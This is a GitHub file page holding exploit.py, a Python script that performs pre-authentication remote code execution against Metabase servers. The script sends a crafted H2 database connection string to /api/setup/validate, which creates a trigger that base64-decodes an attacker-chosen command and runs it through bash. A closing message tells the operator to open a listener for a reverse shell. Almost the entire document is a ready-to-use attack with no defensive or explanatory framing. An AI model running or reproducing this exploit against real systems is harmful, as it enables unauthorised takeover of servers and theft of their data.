-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit.py
55 lines (43 loc) · 1.78 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import requests
import argparse
import base64
def b64(command):
command = command.strip()
encoded = base64.b64encode(command.encode('ascii')).decode()
equal_count = encoded.count('=')
if equal_count >= 1:
encoded = base64.b64encode(f'{command + " " * equal_count}'.encode('ascii')).decode()
return encoded
parser = argparse.ArgumentParser('Metabase Pre-Auth RCE')
parser.add_argument('-u', '--url', type=str, required=True, help='Target URL')
parser.add_argument('-t', '--token', type=str, required=True, help='Setup-Token found in /api/session/properties')
parser.add_argument('-c', '--command', type=str, required=True, help='Command to be executed in the target host')
args = parser.parse_args()
url = f"{args.url}/api/setup/validate"
headers = {'Content-Type': 'application/json'}
command = b64(args.command)
data = {
"token": args.token,
"details":
{
"is_on_demand": "false",
"is_full_sync": "false",
"is_sample": "false",
"cache_ttl": "null",
"refingerprint": "false",
"auto_run_queries": "true",
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo," + command + "}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": "false",
"ssl": "true"
},
"name": "x",
"engine": "h2"
}
}
response = requests.post(url, headers=headers, json=data)
print("Payload sent!\n\nNOTE: Make sure to open a listener on the specifed port and address if you entered a reverse shell command.\n")
print(f"RESPONSE:\n{response.text}")